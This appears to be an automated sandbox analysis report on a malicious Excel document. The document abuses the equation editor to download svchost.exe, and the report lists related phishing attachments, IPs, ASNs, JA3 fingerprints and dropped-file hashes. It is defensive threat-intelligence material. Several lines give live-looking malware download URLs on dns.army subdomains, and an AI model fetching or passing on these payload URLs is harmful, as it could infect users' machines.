                                        PRESUPUESTO .xlsxGet hashmaliciousBrowse
                                        • surestdysbonescagexc.dns.army/documenpt/svchost.exe
                                        PAGO.xlsxGet hashmaliciousBrowse
                                        • surestdysbonescagexc.dns.army/documenpt/svchost.exe
                                        Transf. ppto 310404.xlsxGet hashmaliciousBrowse
                                        • suresstdybonestrands.dns.army/documenpt/svchost.exe?platform=hootsuite
                                        PAGO.xlsxGet hashmaliciousBrowse
                                        • surestdysboneinterst.dns.army/documenpt/svchost.exe
                                        N 283.353.xlsxGet hashmaliciousBrowse
                                        • suresbonestdyinterst.dns.army/documenpt/svchost.jpeg
                                        justification.xlsxGet hashmaliciousBrowse
                                        • suresb1stdyinterstpm.dns.army/receipst/winlog.exe
                                        Fature.xlsxGet hashmaliciousBrowse
                                        • suresb1stdyinterstpm.dns.army/receipst/winlog.exe
                                        5678876567876.xlsxGet hashmaliciousBrowse
                                        • wsdysuresb1interwsnt.dns.army/receipst/winlog.exe
                                        TACSAL.xlsxGet hashmaliciousBrowse
                                        • suresb1sndyintercont.dns.army/receipst/winlog.exe
                                        PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                        • suresb1sndyintercont.dns.army/receipst/winlog.exe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        mail.ita.locaweb.com.brSecuriteInfo.com.W32.MSIL_Kryptik.CYQ.genEldorado.28489.exeGet hashmaliciousBrowse
                                        • 191.252.112.194
                                        PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                        • 191.252.112.194
                                        raNsVi8KRa.exeGet hashmaliciousBrowse
                                        • 191.252.112.194
                                        PRESUPUESTO .xlsxGet hashmaliciousBrowse
                                        • 191.252.112.194
                                        oAcUgY6UzZ.exeGet hashmaliciousBrowse
                                        • 191.252.112.194
                                        PAGO.xlsxGet hashmaliciousBrowse
                                        • 191.252.112.194
                                        fqe.short.gyPROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                        • 18.184.197.212
                                        Proforma Invoice.xlsxGet hashmaliciousBrowse
                                        • 18.184.197.212
                                        remittance info.xlsxGet hashmaliciousBrowse
                                        • 18.184.197.212
                                        Required Order Quantity.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Proforma Invoice.xlsxGet hashmaliciousBrowse
                                        • 18.184.197.212
                                        Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        NEW ORDER.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        TWIDC-AS-APTWIDCLimitedHKPAGO.xlsxGet hashmaliciousBrowse
                                        • 103.153.76.181
                                        PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                        • 103.153.76.181
                                        xqtEOiEeHh.exeGet hashmaliciousBrowse
                                        • 103.155.92.207
                                        Topresh_Sub2.xlsxGet hashmaliciousBrowse
                                        • 103.155.80.177
                                        PAGO.xlsxGet hashmaliciousBrowse
                                        • 103.153.76.181
                                        PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                        • 103.153.76.181
                                        PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                        • 103.153.76.181
                                        PRESUPUESTO .xlsxGet hashmaliciousBrowse
                                        • 103.153.76.181
                                        Neworder7687689585746463.exeGet hashmaliciousBrowse
                                        • 103.153.182.50
                                        PAGO.xlsxGet hashmaliciousBrowse
                                        • 103.153.76.181
                                        Quotation Request-pdf.exeGet hashmaliciousBrowse
                                        • 103.153.77.83
                                        9MyoOYNXKe.exeGet hashmaliciousBrowse
                                        • 103.155.92.70
                                        Pictures and Catalog Attached.exeGet hashmaliciousBrowse
                                        • 103.153.182.50
                                        ab76e3ddfecc8c84fd2179bb40cbe1c535963154c3e6e.exeGet hashmaliciousBrowse
                                        • 103.155.92.70
                                        SecuriteInfo.com.Trojan.Siggen12.47248.16606.exeGet hashmaliciousBrowse
                                        • 103.155.92.70
                                        AWB 9284730932.xlsxGet hashmaliciousBrowse
                                        • 103.155.80.177
                                        WAWASAN RUBY-AGENCY APPOINTMENT LETTER.xlsxGet hashmaliciousBrowse
                                        • 103.155.83.195
                                        AxR7BY4wzz.exeGet hashmaliciousBrowse
                                        • 103.155.92.70
                                        Payment_Advice.xlsxGet hashmaliciousBrowse
                                        • 103.155.83.195
                                        SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
                                        • 103.155.92.70
                                        AMAZON-02USNdBLyH2h5d.exeGet hashmaliciousBrowse
                                        • 52.15.160.167
                                        s6G3ZtvHZg.exeGet hashmaliciousBrowse
                                        • 3.13.255.157
                                        PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                        • 18.184.197.212
                                        PAYMENT COPY.exeGet hashmaliciousBrowse
                                        • 52.79.124.173
                                        g2qwgG2xbe.exeGet hashmaliciousBrowse
                                        • 44.227.76.166
                                        sgJRcWvnkP.exeGet hashmaliciousBrowse
                                        • 52.58.78.16
                                        Proforma Invoice.xlsxGet hashmaliciousBrowse
                                        • 18.184.197.212
                                        SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                                        • 13.235.115.155
                                        remittance info.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Required Order Quantity.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                        • 108.128.238.226
                                        Proforma Invoice.xlsxGet hashmaliciousBrowse
                                        • 18.184.197.212
                                        Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        NEW ORDER.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        winlog.exeGet hashmaliciousBrowse
                                        • 3.14.206.30
                                        J6wDHe2QdA.exeGet hashmaliciousBrowse
                                        • 3.22.15.135
                                        hsOBwEXSsq.exeGet hashmaliciousBrowse
                                        • 3.142.167.54
                                        1B4AF276CB3E0BFC9709174B8F75E13C4B224F4B35A6E.exeGet hashmaliciousBrowse
                                        • 3.13.191.225
                                        36ne6xnkop.exeGet hashmaliciousBrowse
                                        • 99.83.185.45

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        7dcce5b76c8b17472d024758970a406bConfirm Order for AKTEK Company_E4117.pptGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        RFQ P39948220 Inquiry.pptGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Proforma Invoice.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        remittance info.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Required Order Quantity.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Proforma Invoice.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        NEW ORDER.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Alexandra38.docxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        fileshare.docGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        IMAGE20210406_490133692.exe.exeGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Documents_460000622_1464906353.xlsGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                        • 52.59.165.42
                                        Invoice copyt2.ppsGet hashmaliciousBrowse
                                        • 52.59.165.42

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                        Category:dropped
                                        Size (bytes):58596
                                        Entropy (8bit):7.995478615012125
                                        Encrypted:true
                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                        MD5:61A03D15CF62612F50B74867090DBE79
                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):893
                                        Entropy (8bit):7.366016576663508
                                        Encrypted:false
                                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):326
                                        Entropy (8bit):3.094144230589345
                                        Encrypted:false
                                        SSDEEP:6:kKQcwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:bwTJ6HkPlE99SNxAhUe0ht
                                        MD5:D25F646B259EF6CC5D12A660BBFA3357
                                        SHA1:4144EBFD358476654BB51A7BC0C7DE821F998243
                                        SHA-256:DEC4E145A761CCA9FA188A7C820286F20DDD9213927C94ED461F559B8DE2C2FF
                                        SHA-512:D358C50CCB028FFD568FA20324D07F706DB7CD4D5433A5DD49FA4C35BFBB3D3CFA66AB6E33A19389725AB5F80D27536D03D6DB8847BD8A531B5FB24CABD97E12
                                        Malicious:false
                                        Reputation:low
                                        Preview: p...... ............/..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):252
                                        Entropy (8bit):2.9740695516419757
                                        Encrypted:false
                                        SSDEEP:3:kkFklYVfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWlP1:kKaQE1liBAIdQZV7ulPPN
                                        MD5:4CE8A432A8C070911B062F96B38EC574
                                        SHA1:5DDBC2B13006956522776B75B8E226C5C766E617
                                        SHA-256:4AB0F9A823A27A62CD078A1563CB5B35D3B668070F08BF99B9C58B7CEC00778D
                                        SHA-512:00B5DF54C0041EF7899B03E361CA284EC1DDDA7CD5A9BA5F1A0112A9ABD825F3F6CD0777F23088185E15A6BF03415B1B80098CCC4E74840FAA19986D0C72A680
                                        Malicious:false
                                        Reputation:low
                                        Preview: p...... ....`...>7.../..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:downloaded
                                        Size (bytes):657408
                                        Entropy (8bit):7.451139683312535
                                        Encrypted:false
                                        SSDEEP:12288:ZGjq53LgC5jKNlUT2AMav4dJjSe3X/QuNaP9NLQubuKZWZn:4GngNlUT2ANYXouNaP9NHxWZn
                                        MD5:D5A549B16706948E4355EB89A93CEDEB
                                        SHA1:09F26A7F83C70109C89AB50BB0B9B05C9FF18C84
                                        SHA-256:4AF00CBA0575FD3AB00F392EB47DCB31CFDE4B640B22CA08AAF847357C17044D
                                        SHA-512:7F239D783C99337DD8A2F1C7611E818CD20CB1F92FA9AA789AF550DDE354ED46A9F2DB420485BC4EF4F72085E76CD5D11D12D3AEC93B320A3CFCE63869A21FCA
                                        Malicious:true
                                        Reputation:low
                                        IE Cache URL:http://surestdysbonescagecv.dns.army/documenpt/svchost.exe
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..P...........o... ........@.. .......................`............@..................................o..O...........................@....................................................... ............... ..H............text....P... ...P.................. ..`.rsrc...............R..............@..@.reloc.......@......................@..B.................o......H.......................h...(............................................0............($...(%.........(.....o&....*.....................('......((......()......(*......(+....*N..(....o....(,....*&..(-....*.s.........s/........s0........s1........s2........*....0...........~....o3....+..*.0...........~....o4....+..*.0...........~....o5....+..*.0...........~....o6....+..*.0...........~....o7....+..*.0..<........~.....(8.....,!r...p.....(9...o:...s;............~.....+..*.0......
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\234E901.emf
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):3199944
                                        Entropy (8bit):1.0723286533222698
                                        Encrypted:false
                                        SSDEEP:6144:5FPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:5mIvhGJd7mIvhGJd2
                                        MD5:6CFA3170A68147326768DE26F5E88F3C
                                        SHA1:5ABCF9E540CFE7E9F1BB50F43FB139722402D141
                                        SHA-256:5EC13FDB116FAD2A722159AC55F98A857E0925759BCAEB75AC83FCCBF7C3E8C2
                                        SHA-512:5796C7D980E914485DD390F5EE14196EE89CCD7F6F237D4CA7AA88EC9158196E85FD7D5AC2990D9BA3DCCC55F63A8598F47B13020331F54134E931EF018C2A8B
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: ....l................................H.. EMF......0.....................V...........................fZ..U"..F...ti..hi..GDIC........z.@m....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48B2E23A.jpeg
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                        Category:dropped
                                        Size (bytes):48770
                                        Entropy (8bit):7.801842363879827
                                        Encrypted:false
                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55794626.jpeg
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                        Category:dropped
                                        Size (bytes):29499
                                        Entropy (8bit):7.667442162526095
                                        Encrypted:false
                                        SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                        MD5:4FBDDF16124B6C9368537DF70A238C14
                                        SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                        SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                        SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82D1B3EF.jpeg
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                        Category:dropped
                                        Size (bytes):48770
                                        Entropy (8bit):7.801842363879827
                                        Encrypted:false
                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                        Malicious:false
                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87FB93B7.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):50311
                                        Entropy (8bit):7.960958863022709
                                        Encrypted:false
                                        SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                        MD5:4141C7515CE64FED13BE6D2BA33299AA
                                        SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                        SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                        SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                        Malicious:false
                                        Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8CCFB279.jpeg
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                        Category:dropped
                                        Size (bytes):14198
                                        Entropy (8bit):7.916688725116637
                                        Encrypted:false
                                        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                        SHA1:72CA86D260330FC32246D28349C07933E427065D
                                        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                        Malicious:false
                                        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91806A4C.jpeg
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                        Category:dropped
                                        Size (bytes):14198
                                        Entropy (8bit):7.916688725116637
                                        Encrypted:false
                                        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                        SHA1:72CA86D260330FC32246D28349C07933E427065D
                                        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                        Malicious:false
